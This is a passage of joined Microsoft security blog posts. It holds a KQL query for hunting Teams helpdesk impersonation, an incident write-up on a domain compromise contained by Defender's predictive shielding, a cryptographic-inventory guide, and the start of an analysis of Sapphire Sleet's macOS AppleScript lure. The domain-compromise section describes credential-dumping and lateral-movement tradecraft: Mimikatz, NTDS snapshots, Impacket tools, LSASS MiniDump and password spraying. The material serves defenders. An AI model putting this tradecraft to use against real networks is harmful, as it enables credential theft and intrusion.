| project DeviceName, RMMTime, ReconTime, ReconProc, ReconCmd

K. Sample Correlation Query Between Chat, First Contact, and Alerts

Note. Please modify or tune for your specific environment.

let _timeFrame = 30m;      // Tune: how long after the Teams event to look for matching alerts
let _huntingWindow = 4d;   // Tune: broader lookback increases coverage but also cost
// Seed Teams message activity and normalize the victim/join fields you want to carry forward
let _teams = materialize (
    MessageEvents
    | where Timestamp > ago(_huntingWindow)
    | extend Recipient = parse_json(RecipientDetails)
    // Optional tuning: add sender/name/content filters here first to reduce volume early
    //| where SenderDisplayName contains "add keyword"
    //          or SenderDisplayName contains "add keyword"
    // add other hunting terms 
    | mv-expand Recipient
    | extend VictimAccountObjectId = tostring(Recipient.RecipientObjectId),
             VictimUPN = tostring(Recipient.RecipientSmtpAddress)
    | project
        TTime = Timestamp,
        SenderUPN = SenderEmailAddress,
        SenderDisplayName,
        VictimUPN,
        VictimAccountObjectId,
        ChatThreadId = ThreadId
);
// Distinct key sets used to prefilter downstream tables before joining
let _VictimAccountObjectId = materialize(
    _teams
    | where isnotempty(VictimAccountObjectId)
    | distinct VictimAccountObjectId
);
let _VictimUPN = materialize(
    _teams
    | where isnotempty(VictimUPN)
    | distinct VictimUPN
);
let _ChatThreadId = materialize(
    _teams
    | where isnotempty(ChatThreadId)
    | distinct ChatThreadId
);
// Find first-seen chat creation events for the chat threads already present in _teams
// Tune: add more CloudAppEvents filters here if you want to narrow to external / one-on-one / specific chat types
let _firstContact = materialize(
    CloudAppEvents
    | where Timestamp > ago(_huntingWindow)
    | where Application has "Teams"
    | where ActionType == "ChatCreated"
    | extend Raw = todynamic(RawEventData)
    | extend ChatThreadId = tostring(Raw.ChatThreadId)
    | where isnotempty(ChatThreadId)
    | join kind=innerunique (_ChatThreadId) on ChatThreadId
    | summarize FCTime = min(Timestamp) by ChatThreadId
);
// Alert branch 1: match by victim object ID
// Usually the cleanest identity join if the field is populated consistently
let _alerts_by_oid = materialize(
    AlertEvidence
    | where Timestamp > ago(_huntingWindow)
    | where AccountObjectId in (_VictimAccountObjectId)
    | project
        ATime = Timestamp,
        AlertId,
        Title,
        AccountName,
        AccountObjectId,
        AccountUpn = "",
        SourceId = "",
        ChatThreadId = ""
);
// Alert branch 2: match by victim UPN
// Useful when ObjectId is missing or alert evidence is only populated with UPN
let _alerts_by_upn = materialize(
    AlertEvidence
    | where Timestamp > ago(_huntingWindow)
    | where AccountUpn in (_VictimUPN)
    | project
        ATime = Timestamp,
        AlertId,
        Title,
        AccountName,
        AccountObjectId,
        AccountUpn,
        SourceId = "",
        ChatThreadId = ""
);
// Alert branch 3: match by chat thread ID
// Tune: this is typically the most expensive branch because it inspects AdditionalFields
let _alerts_by_thread = materialize(
    AlertEvidence
    | where Timestamp > ago(_huntingWindow)
    | where AdditionalFields has_any (_ChatThreadId)
    | extend AdditionalFields = todynamic(AdditionalFields)
    | extend
        SourceId = tostring(AdditionalFields.SourceId),
        ChatThreadIdRaw = tostring(AdditionalFields.ChatThreadId)
    | extend ChatThreadId = coalesce(
        ChatThreadIdRaw,
        extract(@"/(?:chats|channels|conversations|spaces)/([^/]+)/", 1, SourceId)
    )
    | where isnotempty(ChatThreadId)
    | join kind=innerunique (_ChatThreadId) on ChatThreadId
    | project
        ATime = Timestamp,
        AlertId,
        Title,
        AccountName,
        AccountObjectId,
        AccountUpn = "",
        SourceId,
        ChatThreadId
);
//
// add branch 4 to corrilate with host events
//
// Add first-contact context back onto the Teams seed set
let _teams_fc = materialize(
    _teams
    | join kind=leftouter _firstContact on ChatThreadId
    | extend FirstContact = isnotnull(FCTime)
);
// Join path 1: Teams victim object ID -> alert AccountObjectId
let _matches_oid =
    _teams_fc
    | where isnotempty(VictimAccountObjectId)
    | join hint.strategy=broadcast kind=leftouter (
        _alerts_by_oid
    ) on $left.VictimAccountObjectId == $right.AccountObjectId
    // Time bound keeps only alerts near the Teams activity; widen/narrow _timeFrame to tune sensitivity
    | where isnull(ATime) or ATime between (TTime .. TTime + _timeFrame)
    | extend MatchType = "ObjectId";
// Join path 2: Teams victim UPN -> alert AccountUpn
let _matches_upn =
    _teams_fc
    | where isnotempty(VictimUPN)
    | join hint.strategy=broadcast kind=leftouter (
        _alerts_by_upn
    ) on $left.VictimUPN == $right.AccountUpn
    | where isnull(ATime) or ATime between (TTime .. TTime + _timeFrame)
    | extend MatchType = "VictimUPN";
// Join path 3: Teams chat thread -> alert chat thread
let _matches_thread =
    _teams_fc
    | where isnotempty(ChatThreadId)
    | join hint.strategy=broadcast kind=leftouter (
        _alerts_by_thread
    ) on ChatThreadId
    | where isnull(ATime) or ATime between (TTime .. TTime + _timeFrame)
    | extend MatchType = "ChatThreadId";
//
// add branch 4 for host events
//
// Merge all match paths and collapse multiple alert hits per Teams event into one row
union _matches_oid, _matches_upn, _matches_thread
| summarize
    AlertTitles = make_set(Title, 50),
    AlertIds = make_set(AlertId, 50),
    MatchTypes = make_set(MatchType, 10),
    FirstAlertTime = min(ATime)
    by
        TTime,
        SenderUPN,
        SenderDisplayName,
        VictimUPN,
        VictimAccountObjectId,
        ChatThreadId

Protecting your organization from collaboration‑based impersonation attacks as demonstrated throughout this intrusion chain, cross‑tenant helpdesk impersonation campaigns rely less on platform exploitation and more on persuading users to initiate trusted remote access workflows within legitimate enterprise collaboration tools such as Microsoft Teams.

Organizations should treat any unsolicited external support contact as inherently suspicious and implement layered defenses that limit credential‑backed remote sessions, enforce Conditional Access with MFA and compliant device requirements, and restrict the use of administrative protocols such as WinRM to authorized management workstations. At the endpoint and identity layers, enabling Attack Surface Reduction (ASR) rules, Zero‑hour Auto Purge (ZAP), Safe Links for Teams messages, and network protection can reduce opportunities for sideloaded execution and outbound command‑and‑control activity that blend into routine HTTPS traffic.

Finally, organizations should reinforce user education—such as establishing internal helpdesk authentication phrases and training employees to verify external tenant indicators—to prevent adversaries from converting legitimate collaboration workflows into attacker‑guided remote access and staged data exfiltration pathways. As attackers adapt their impersonation tactics, Microsoft Defender Experts continues to strengthen protections across Teams, identity, and endpoint security to help reduce risk as threats shift.

References

This research is provided by Microsoft Defender Security Research with contributions from Jesse Birch, Sagar Patil, Balaji Venkatesh S (DEX), Eric Hopper, Charu Puhazholiand other members of Microsoft Threat Intelligence.

Learn More

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.   

The post Cross‑tenant helpdesk impersonation to data exfiltration: A human-operated intrusion playbook appeared first on Microsoft Security Blog.

Containing a domain compromise: How predictive shielding shut down lateral movement

In identity-based attack campaigns, any initial access activity can turn an already serious intrusion into a critical incident once it allows a threat actor to obtain domain-administration rights. At that point, the attacker effectively controls the Active Directory domain: they can change group memberships and Access Control Lists (ACLs), mint Kerberos tickets, replicate directory secrets, and push policy through mechanisms like Group Policy Objects (GPOs), among others.

What makes domain compromise especially challenging is how quickly it could happen: in many real-world cases, domain-level credentials are compromised immediately following the very first access, and once these credentials are exposed, they’re often abused immediately, well before defenders can fully scope what happened. Apart from this speed gap, responding to this type of compromise could also prove difficult. For one, incident responders can’t just simply “turn off” domain controllers, service accounts, or identity infrastructure and core services without risking business continuity. In addition, because compromised credential artifacts can spread fast and be replayed to expand access, restoring the identity infrastructure back to a trusted state usually means taking steps (for example, krbtgt rotation, GPO cleanup, and ACL validation) that could take additional time and effort in an already high-pressure situation.

These challenges highlight the need for a more proactive approach in disrupting and containing credential-based attacks as they happen. Microsoft Defender’s predictive shielding capability in automatic attack disruption helps address this need. Its ability to predict where attacks will pivot next and apply just in time hardening actions to  block credential abuse—including those targeting high-privilege accounts like domain admins—and lateral movement at near-real-time speed, shifting the advantageto the defenders.

Previously, we discussed how predictive shielding was able to disrupt a human-operated ransomware incident. In this blog post, we take a look at a real-world Active Directory domain compromise that illustrates the critical inflection point when a threat actor achieves domain -level control. We walk through the technical details of the incident to highlight attacker tradecraft, the operational challenges defenders face after domain compromise, and the value of proactive, exposure-based containment that predictive shielding provides.

Predictive shielding overview

Predictive shielding is a capability in Microsoft Defender’s automatic attack disruption that helps stop the spread of identity-based attacks, before an attacker fully operationalizes stolen credentials. Instead of waiting for an account to be observed doing something malicious, predictive shielding focuses on moments when credentials are likely exposed: when Defender sees high-confidence signals of credential theft activity on a device, it can proactively restrict the accounts that might have been exposed there.

Essentially, predictive shielding works as follows:

  • Defender detects post-breach activity strongly associated with credential exposure on a device.
  • It evaluates which high-privilege identities were likely exposed in that context.
  • It applies containment to those identities to reduce the attacker’s ability to pivot, limiting lateral movement paths and high-impact identity operations while the incident is being investigated and remediated. The intent is to close the “speed gap” where attackers can reuse newly exposed credentials faster than responders can scope, reset, and clean up.

This capability is available as an out-of-the-box enhancement for Microsoft Defender for Endpoint P2 customers who meet the Microsoft Defender prerequisites.

The following section revisits a real-world domain compromise that showcases how attack disruption and predictive shielding changed the outcome by acting on exposure, rather than just observed abuse. Interestingly, this case happened just as we’re rolling out the predictive shielding, so you can see the changes in both attacker tradecraft and the detection and response actions before and after this capability was deployed.

Attack chain overview

In June 2025, a public sector organization was targeted by a threat actor. This threat actor progressed methodically: initial exploitation, local escalation, directory reconnaissance, credential access, and expansion into Microsoft Exchange and identity infrastructure.  

Figure 1. Attack diagram of the domain compromise.

Initial entry: Pre-domain compromise

The campaign began at the edge: a file-upload flaw in an internet-facing Internet Information Services (IIS) server was abused to plant and launch a web shell. The attacker then simultaneously performed various reconnaissance activities using the compromised account through the web shell and escalated their privileges to NT AUTHORITY\SYSTEM by abusing a Potato-class token impersonation primitive (for example, BadPotato).

The discovery commands observed in the attack include the following example:

Using the compromised IIS service account, the attacker attempted to reset the passwords of high-impact identities, a common technique used to gain control over accounts without performing credential dumping. The attacker also deployed Mimikatz to dump logon secrets (for example, MSV, LSASS, and SAM), harvesting credentials that are exposed on the device.

Had predictive shielding been released at this point, automated restrictions on exposed accounts could have stopped the intrusion before it expanded beyond the single-host foothold. However, at the time of the incident, this capability hasn’t been deployed to customers yet.

Key takeaway: At this stage of an attack, it’s important to keep the containment host‑scoped. Defenders should prioritize blocking credential theft and stopping escalation before it reaches the identity infrastructure.

First pivot: Directory credential materialization and Exchange delegation

Within 24 hours, the attacker abused privileged accounts and remotely created a scheduled task on a domain controller. The task initiated NTDS snapshot activity and packaged the output using makecab.exe, enabling offline access to directory credential material that’s suitable for abusing credentials at scale:

Because the first malicious action by the abused account already surfaced the entire Active Directory credentials, stopping its path for total domain compromise was no longer feasible.

The threat actor then planted a Godzilla web shell on Exchange Server, used a privileged context to enumerate accounts with ApplicationImpersonation role assignments, and granted full access to a delegated principal across mailboxes using Add‑MailboxPermission. This access allowed the threat actor to read and manipulate all mailbox contents.

The attack also used Impacket’s atexec.py to enumerate the role assignments remotely. Its use triggered the attack disruption capability in Defender, revoking the account sessions of an admin account and blocking it from further use.

Following the abused account’s disruption, the attacker attempted several additional actions, such as resetting the disrupted account’s and other accounts’ passwords. They also attempted to dump credentials of a Veeam backup device.

Key takeaway: This pivot is a turning point. Once directory credentials and privileged delegation are in play, the scope and impact of an incident expand fast. Defenders should prioritize protecting domain controllers, privileged identities, and authentication paths.

Scale and speed: Tool return, spraying, and lateral movement

Weeks later, the threat actor returned with an Impacket tooling (for example, secretsdump and PsExec) that resulted in repeated disruptions by Defender against the abused accounts that they used. These disruptions forced the attacker to pivot to other compromised accounts and exhaust their resources.

Following Defender’s disruptions, the threat actor then launched a broad password spray from the initially compromised IIS server, unlocking access to at least 14 servers through password reuse. They also attempted remote credential dumping against a couple of domain controllers and an additional IIS server using multiple domain and service principals.

Key takeaway: Even though automatic attack disruption acted right away, the attacker already possessed multiple credentials due to the previous large-scale credential dumping. This scenario showcases the race to detect and disrupt credential abuse and is the reason we’re introducing predictive shielding to preemptively disrupt exposed accounts at risk.

Predictive shielding breaks the chain: Exposure-centric containment

In the second phase of the attack, we activated predictive shielding. When exposure signals surfaced (for example, credential dumping attempts and replay from compromised hosts), automated containment blocked new sign-in attempts and interactive pivots not only for the abused accounts, but also for context-linked identities that are active on the same compromised surfaces.

Attack disruption contained high-privileged principals to prevent these accounts from being abused. Crucially, when a high-tier Enterprise or Schema Admin credential was exposed, predictive shielding contained it pre-abuse, preventing what would normally become a catastrophic escalation.

Second pivot: Alternative paths to new credentials

With high-value identities pre-contained, the threat actor pivoted to exploiting Apache Tomcat servers. They compromised three Tomcat servers, dropped the Godzilla web shell, and launched the PowerShell-based Invoke-Mimikatz command to harvest additional credentials. At one point, the attacker operated under Schema Admin:

They then used Impacket WmiExec to access Microsoft Entra Connect servers and attempt to extract Entra Connect synchronization credentials. The account used for this pivot was later contained, limiting further lateral movement.

Last attempts and shutdown

In the final phase of the attack, the threat actor attempted a full LSASS dump on a file sharing server using comsvcs.dll MiniDump under a domain user account, followed by additional NTDS activity:

Attack disruption in Defender repeatedly severed sessions and blocked new sign-ins made by the threat actor. On July 28, 2025, the attack campaign lost momentum and stopped.

How predictive shielding changed the outcome

Before compromising a domain, attackers are mostly constrained by the hosts they control. However, even a small set of exposed credentials could remove their constraints and give them broad access through privileged authentication and delegated pathways. The blast radius spreads fast, time pressure spikes, and containment decisions become riskier because identity infrastructure and high-privilege accounts are production dependencies.

The incident we revisited earlier almost followed a similar pattern. It unfolded while predictive shielding was still being launched, so the automated predictive containment capability only became active at the midway of the attack campaign. During the attack’s first stages, the threat actor had room to scale—they returned with new tooling, launched a broad password spray attack, and expanded access across multiple servers. They also attempted remote credential dumping against domain controllers and servers.

When predictive shielding went live, it helped shift the story and we then saw the change of pace—instead of reacting to each newly abused account, the capability allowed Defender to act preemptively and turn credential theft attempts into blocked pivots. Defender was able to block new sign-ins and interactive pivots, not just for the single abused account, but also for context-linked identities that were active on the same compromised surfaces.

With high-value identities pre-contained, the adversary shifted tradecraft and chased other credential sources, but each of their subsequent attempts triggered targeted containment that limited their lateral reach until they lost momentum and stopped. How this incident concluded is the operational “tell” that containment is working, in that once privileged pivots get blocked, threat actors often hunt for alternate credential sources, and defenses must continue following the moving blast radius.

As predictive shielding matures, it will continue to expand its prediction logic and context-linked identities.

MITRE ATT&CK® techniques observed

The following table maps observed behaviors to ATT&CK®.

Tactics shown are per technique definition.

Tactic(s)Technique IDTechnique nameObserved details
Initial AccessT1190Exploit Public-Facing ApplicationExploited a file-upload vulnerability in an IIS server to drop a web shell.
PersistenceT1505.003Server Software Component: Web ShellDeployed web shells for persistent access.
ExecutionT1059.001Command and Scripting Interpreter: PowerShellUsed PowerShell for Exchange role queries, mailbox permission changes, and Invoke-Mimikatz.
Privilege EscalationT1068Exploitation for Privilege EscalationUsed BadPotato to escalate to SYSTEM on an IIS server.
Credential AccessT1003.001OS Credential Dumping: LSASS MemoryDumped LSASS using Mimikatz and comsvcs.dll MiniDump.
Credential AccessT1003.003OS Credential Dumping: NTDSPerformed NTDS-related activity using ntdsutil snapshot/IFM workflows on a domain controller.
Execution; Persistence; Privilege EscalationT1053.005Scheduled Task/Job: Scheduled TaskCreated remote scheduled tasks to execute under SYSTEM on a domain controller.
DiscoveryT1087.002Account Discovery: Domain AccountEnumerated domain groups and accounts using net group and AD Explorer.
Lateral MovementT1021.002Remote Services: SMB/Windows Admin SharesUsed admin shares/SMB-backed tooling (for example, PsExec) for lateral movement.
Lateral MovementT1021.003Remote Services: Windows Remote ManagementUsed WmiExec against Microsoft Entra Connect servers.
Credential AccessT1110.003Brute Force: Password SprayingPerformed password spraying leading to access across at least 14 servers.
CollectionT1114.002Email Collection: Remote Email CollectionExpanded mailbox access broadly through impersonation or permission changes.
Command and ControlT1071.001Application Layer Protocol: Web ProtocolsWeb shells communicated over HTTP/S.
Defense EvasionT1070.004Indicator Removal on Host: File DeletionUsed cleanup scripts (for example, del.bat) to remove dump artifacts.
Persistence; Privilege EscalationT1098Account ManipulationManipulated permissions and roles to expand access and sustain control.
Credential AccessT1078Valid AccountsReused compromised service and domain accounts for access and lateral movement.

Learn more

For more information about automatic attack disruption and predictive shielding, see the following Microsoft Learn articles:

The post Containing a domain compromise: How predictive shielding shut down lateral movement appeared first on Microsoft Security Blog.

Building your cryptographic inventory: A customer strategy for cryptographic posture management

Post-quantum cryptography (PQC) is coming—and for most organizations, the hardest part won’t be choosing new algorithms. It will be finding where cryptography is used today across applications, infrastructure, devices, and services so teams can plan, prioritize, and modernize with confidence. At Microsoft, we view this as the practical foundation of quantum readiness: you can’t protect or migrate what you can’t see.

As described in our Quantum Safe Program strategy, cryptography is embedded in all modern IT environments across every industry: in applications, network protocols, cloud services, and hardware devices. It also evolves constantly to ensure the best protection from newly discovered vulnerabilities, evolving standards from bodies like NIST and IETF, and emerging regulatory requirements. However, many organizations face a widespread challenge: without a comprehensive inventory and effective lifecycle process, they lack the visibility and agility needed to keep their infrastructure secure and up to date. As a result, when new vulnerabilities or mandates emerge, teams often struggle to quickly identify affected assets, determine ownership, and prioritize remediation efforts. This underscores the importance of establishing clear, ongoing inventory practices as a foundation for resilient management across the enterprise.

The first and most critical step toward a quantum-safe future—and sound cryptographic hygiene in general—is building a comprehensive cryptographic inventory. PQC adoption (like any cryptographic transition) is ultimately an engineering and operations exercise: you are updating cryptography across real systems with real dependencies, and you need visibility to do it safely.

In this post, we will define what a cryptographic inventory is, outline a practical customer-led operating model for managing cryptographic posture, and show how customers can start quickly using Microsoft Security capabilities and our partners.

What is a cryptographic inventory?

A cryptographic inventory is a living catalog of all the cryptographic assets and mechanisms in use across your organization. This includes the following examples:

CategoryExamples/Details

Certificates and keys

X.509 certificates, private/public key pairs, certificate authorities, key management systems

Protocols and cipher suites

TLS/SSL versions and configurations, SSH protocols, IPsec implementations

Cryptographic libraries

OpenSSL, LibCrypt, SymCrypt, other libraries embedded in applications

Algorithms in code

Cryptographic primitives referenced in source code (RSA, ECC, AES, hashing functions)

Encrypted session metadata

Active network sessions using encryption, protocol handshake details

Secrets and credentials

API keys, connection strings, service principal credentials stored in code, configuration files, or vaults

Hardware security modules (HSMs)

Physical and virtual HSMs, Trusted Platform Modules (TPMs)

Why does this inventory matter? First, governance and compliance: 15 countries and the EU recommend or require some subset of organizations to do cryptographic inventorying. These are implemented through regulations like DORA, government policies like OMB M-23-02, and industry security standards like PCI DSS 4.0. We expect the number and scope of these polices to grow globally.

Second, risk prioritization: Cryptographic assets present varying levels of risk. For example, an internet-facing TLS endpoint using weak ciphers poses different threats compared to an internal test certificate, or local disk encryption utilizing the AES standard. Maintaining a comprehensive inventory enables effective assessment of exposure and facilitates the prioritization of remediation efforts, ensuring that risk-based decisions incorporate live telemetry and data sensitivity.

Third, it helps enable crypto agility: When a vulnerability is discovered in an encryption algorithm, an inventory can tell you exactly what needs updating and where.

Customer-led cryptography posture management lifecycle

Cryptography Posture Management (CPM) is not a single product, it’s an ongoing lifecycle that customers build and maintain using a combination of tools, integrations, and processes. Many organizations are building Quantum Safe Programs as a broader umbrella for cryptographic readiness. Whether or not you use that exact label, the technical foundation tends to look the same:

  1. Define what you are managing (the inventory scope and critical assets).
  2. Define how you make decisions (risk assessment and prioritization).
  3. Define how you execute change safely (remediation and validation).
  4. Define how you keep it current (continuous monitoring).
Diagram illustrating a customer-led CPM cycle with six stages: Discover, Normalize, Assess risk, Prioritize, Remediate, and Continuous monitoring, arranged in a circular flow with arrows indicating process direction.

This is where CPM is best understood as a lifecycle you run continuously:

  1. Discover: Collect cryptographic signals from across your environment – code repositories, runtime environments, network traffic, and storage systems.
  2. Normalize: Aggregate signals into a unified inventory with consistent data schema (certificate thumbprints, algorithm types, key lengths, and expiration dates). 
  3. Assess Risk: Evaluate cryptographic assets against policy baselines, industry standards, and known vulnerabilities. Identify weak algorithms, expired certificates, and non-compliant configurations. 
  4. Prioritize: Rank findings by risk based on asset criticality, exposure (internal vs. internet-facing), and compliance requirements. 
  5. Remediate: Rotate keys, update libraries, reconfigure protocols, and replace weak algorithms—using available automation and tooling. 
  6. Continuous Monitoring: Continuously track changes. New code commits, certificate renewals, configuration drift, and emerging vulnerabilities all require ongoing vigilance. 
Diagram illustrating a customer-led CPM cycle with four phases: Preparation, Understanding, Planning & Execution, and Monitoring & Evaluation, arranged in a circular flow with arrows indicating process direction.

You can apply the lifecycle above across four domains: code, network, runtime, and storage:

  • Code: Cryptographic primitives and libraries in source code, detected through source code analysis.
  • Storage: Certificates, keys, and secrets stored on disk, in databases, in key vaults, or configuration files.
  • Network: Encrypted traffic sessions, TLS/SSH handshakes, cipher suite negotiations.
  • Runtime: In-memory usage of cryptographic libraries, active key material, process-level crypto operations.
A diagram outlining the steps of the CPM cycle, including risk assessment, planning, execution, normalization, prioritization, preparation, discovery, remediation, and continuous monitoring, with connections to the four components of code, storage, networks, and runtime.

Since the operating model is broad across multiple signals with no single team or platform, ensure you define clear ownership for each stage, with consistent inputs and measurable outputs. That’s why a “one-and-done” scan rarely holds up. The environment changes constantly new deployments, new libraries, renewed certificates, new endpoints, and new policies. The path that scales is an operating model, not a one-time project. By organizing your approach around these domains, you can systematically identify gaps, leverage the right tools for each domain, and build a holistic view of your cryptographic posture.

Building your inventory with Microsoft tools

You don’t have to start from scratch. Many organizations already have Microsoft Security and Azure capabilities deployed that can generate cryptographic signals across code, endpoints, cloud workloads, and networks. The goal is to connect and normalize those signals into an inventory that supports risk-based decisions—then extend coverage with partner solutions where you need deeper visibility, automation, or multi-vendor reach:

Microsoft ToolCryptographic SignalsDomain CoveragePublic Documentation

GitHub Advanced Security (GHAS)

Identifies cryptographic algorithm artifacts in code via CodeQL

Code

Addressing post-quantum cryptography with CodeQL

Microsoft Defender for Vulnerability Management (MDVM)

Certificate inventory from devices with MDE agents, including asymmetric keys algorithm details; detects cryptographic libraries and their vulnerabilities

Runtime, Storage

Certificate inventory Vulnerable components

Microsoft Defender for Endpoint (MDE)

Identifies encrypted traffic sessions (TLS, SSH) via network detection and response

Runtime, Network

Network protection – MDE

Microsoft Defender for Cloud (MDC)

Secret scanning for private keys exposed on cloud infrastructure; DevOps security for code repositories

Storage, Code

Protecting secrets in Defender for Cloud

Azure Key Vault

Centralized inventory of keys, secrets, and certificates stored in Azure

Storage

Azure Key Vault documentation

Azure Networking (Firewall, Network Watcher)

High-level indication of encrypted traffic, protocol information (TLS, encrypted communication types)

Network

Azure Network Watcher overview

Using these tools in the initial phases:

  1. Code Domain: Activate GitHub Advanced Security for your repositories. Use CodeQL queries to scan for cryptographic algorithm usage, and export results for central oversight.
  2. Runtime and Storage Domain: Deploy Microsoft Defender for Endpoint and Defender Vulnerability Management across your endpoints. Use the certificate inventory feature to discover certificates and their associated algorithms. Review vulnerable cryptographic libraries flagged by MDVM.
  3. Network Domain: Enable network protection in MDE to identify encrypted sessions. If you’re using Azure, configure Azure Network Watcher to capture traffic metadata and identify encrypted flows.
  4. Storage Domain: Audit your Azure Key Vault instances to inventory secrets, keys, and certificates. Use Defender for Cloud secret scanning to detect exposed keys in IaaS and PaaS resources.
  5. Normalize & Centralize: Bring outputs together in a common view and schema for tracking (for example, in a security data platform or SIEM such as Microsoft Sentinel). Many teams start with supported exports/connectors and existing reporting workflows—then mature toward automation and governed data pipelines as the program scales. The goal is a single, queryable inventory that teams can operate.
  6. Assess & Prioritize: Define your cryptographic policy baselines (e.g., minimum key lengths, approved algorithms, certificate expiration thresholds). Compare your inventory against these baselines and prioritize based on risk.

This approach leverages tools many organizations already have deployed, providing a pragmatic starting point without requiring significant new investment.

Accelerating your journey with the partner ecosystem

As organizations progress from initial cryptographic inventory to ongoing posture management, Microsoft partners with leading CPM providers to deliver comprehensive solutions that address complex environments across code, infrastructure, devices, applications, and both cloud and on-premises systems. These integrated CPM solutions—running on Azure and deeply connected with the Microsoft Security platform—enable holistic inventory, visibility, and risk assessment by collecting cryptographic signals from Microsoft and non-Microsoft sources, supporting industries with stringent regulatory demands and complex legacy estates, and providing unified management, guided remediation, and quantum security readiness at scale.

Microsoft partners such as Keyfactor, Forescout, Entrust, and Isara, have CPM solutions available today. Each partner delivers unique capabilities spanning certificate and key lifecycle management, network visibility, software supply chain, and code analysis. Together, this growing ecosystem gives customers the flexibility to adopt CPM solutions integrated with the Microsoft Security platform that support a broad range of customer scenarios and align to your architecture, risk profile, and operational maturity.

  • Keyfactor: Keyfactor AgileSec discovers, then continuously monitors, all instances of your cryptography, known and unknown, to understand where and how they are used across the organization. Assets are then processed to flag vulnerabilities to enable teams to efficiently remediate risks with advanced integration workflows, providing the base for crypto-agility and quantum readiness.
  • Forescout: Forescout Cyber Assurance solution on Azure allows a customer to determine real-time network risk of an enterprise asset including its usage of PQC and non-PQC communications, matrixed by 1,000’s of other attributes including application, protocol, country, geo, risk and posture across IT, IoT and OT environments.
  • Entrust: Entrust Cryptographic Security Platform delivers visibility, automation, and control across PKI, key and certificate lifecycle management, and HSMs within a scalable architecture built for crypto-agility and post-quantum readiness.
  • Isara: ISARA Advance™ is a crypto posture management solution for enterprises and agencies. Advance is deployed on Microsoft Azure to automate discovery and inventory, quantify the risks, prioritize, and remediate. Within hours of deployment, it discovers cryptographic threats due to outdated protocols, weaknesses in key strengths and algorithms, prioritizes, and allows remediation of the cryptography and configuration changes on the servers, apps, databases, and source code components.

Getting started: a customer checklist

Ready to begin building your cryptographic inventory? Here’s a practical checklist to get started:

  1. Establish ownership: Assign clear accountability for cryptographic governance. This often spans security, infrastructure, and development teams. It ensures someone owns the overall inventory and posture.
  2. Start inventory collection: Use the starter playbook above or a Microsoft Partner to begin collecting signals from code, runtime, network, and storage domains using Microsoft tools you already have.
  3. Define crypto policy baselines: Document your organization’s cryptographic standards (approved algorithms, minimum key lengths, certificate validity periods, protocol versions). Align with industry standards and compliance requirements.
  4. Prioritize exposures: Not all findings are equal. Prioritize based on asset criticality, exposure (internet-facing vs. internal), and compliance mandates.
  5. Plan remediation: Identify remediation approaches for high-priority findings—library updates, certificate rotations, protocol reconfigurations. Build runbooks and automation where possible.
  6. Leverage partners to accelerate: If you need broader coverage, faster deployment, or specialized capabilities, explore the partner ecosystem on Azure Marketplace to find solutions that integrate with your Microsoft security investments and accelerate your efforts.

Cryptographic posture management is a journey, not a destination. As standards evolve, new vulnerabilities emerge, and quantum computing advances, your inventory and operating model will need to adapt. But, by starting now, with the tools you have, the partners who can help, and a clear operating model, you’ll be well-positioned not only for the quantum era but for sound cryptographic hygiene in the years ahead.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post Building your cryptographic inventory: A customer strategy for cryptographic posture management appeared first on Microsoft Security Blog.

Dissecting Sapphire Sleet’s macOS intrusion from lure to compromise

Executive summary

Microsoft Threat Intelligence uncovered a macOS‑focused cyber campaign by the North Korean threat actor Sapphire Sleet that relies on social engineering rather than software vulnerabilities. By impersonating a legitimate software update, threat actors tricked users into manually running malicious files, allowing them to steal passwords, cryptocurrency assets, and personal data while avoiding built‑in macOS security checks. This activity highlights how convincing user prompts and trusted system tools can be abused, and why awareness and layered security defenses remain critical.


Microsoft Threat Intelligence identified a campaign by North Korean state actor Sapphire Sleet demonstrating new combinations of macOS-focused execution patterns and techniques, enabling the threat actor to compromise systems through social engineering rather than software exploitation. In this campaign, Sapphire Sleet takes advantage of user‑initiated execution to establish persistence, harvest credentials, and exfiltrate sensitive data while operating outside traditional macOS security enforcement boundaries. While the techniques themselves are not novel, this analysis highlights execution patterns and combinations that Microsoft has not previously observed for this threat actor, including how Sapphire Sleet orchestrates these techniques together and uses AppleScript as a dedicated, late‑stage credential‑harvesting component integrated with decoy update workflows.

After discovering the threat, Microsoft shared details of this activity with Apple as part of our responsible disclosure process. Apple has since implemented updates to help detect and block infrastructure and malware associated with this campaign. We thank the Apple security team for their collaboration in addressing this activity and encourage macOS users to keep their devices up to date with the latest security protections.

This activity demonstrates how threat actors continue to rely on user interaction and trusted system utilities to bypass macOS platform security protections, rather than exploiting traditional software vulnerabilities. By persuading users to manually execute AppleScript or Terminal‑based commands, Sapphire Sleet shifts execution into a user‑initiated context, allowing the activity to proceed outside of macOS protections such as Transparency, Consent, and Control (TCC), Gatekeeper, quarantine enforcement, and notarization checks. Sapphire Sleet achieves a highly reliable infection chain that lowers operational friction and increases the likelihood of successful compromise—posing an elevated risk to organizations and individuals involved in cryptocurrency, digital assets, finance, and similar high‑value targets that Sapphire Sleet is known to target.

In this blog, we examine the macOS‑specific attack chain observed in recent Sapphire Sleet intrusions, from initial access using malicious .scpt files through multi-stage payload delivery, credential harvesting using fake system dialogs, manipulation of the macOS TCC database, persistence using launch daemons, and large-scale data exfiltration. We also provide actionable guidance, Microsoft Defender detections, hunting queries, and indicators of compromise (IOCs) to help defenders identify similar threats and strengthen macOS security posture.

Sapphire Sleet’s campaign lifecycle

Initial access and social engineering

Sapphire Sleet is a North Korean state actor active since at least March 2020 that primarily targets the finance sector, including cryptocurrency, venture capital, and blockchain organizations. The primary motivation of this actor is to steal cryptocurrency wallets to generate revenue, and target technology or intellectual property related to cryptocurrency trading and blockchain platforms.

Recent campaigns demonstrate expanded execution mechanisms across operating systems like macOS, enabling Sapphire Sleet to target a broader set of users through parallel social engineering workflows.

Sapphire Sleet operates a well‑documented social engineering playbook in which the threat actor creates fake recruiter profiles on social media and professional networking platforms, engages targets in conversations about job opportunities, schedules a technical interview, and directs targets to install malicious software, which is typically disguised as a video conferencing tool or software developer kit (SDK) update.

In this observed activity, the target was directed to download a file called Zoom SDK Update.scpt—a compiled AppleScript that opens in macOS Script Editor by default. Script Editor is a trusted first-party Apple application capable of executing arbitrary shell commands using the do shell script AppleScript command.

Lure file and Script Editor execution

Flowchart illustrating Sapphire Sleet targeting users with a fake Zoom Support meeting invite, leading to the user joining the meeting, downloading a malicious AppleScript file, and executing the script via Script Editor.
Figure 1. Initial access: The .scpt lure file as seen in macOS Script Editor

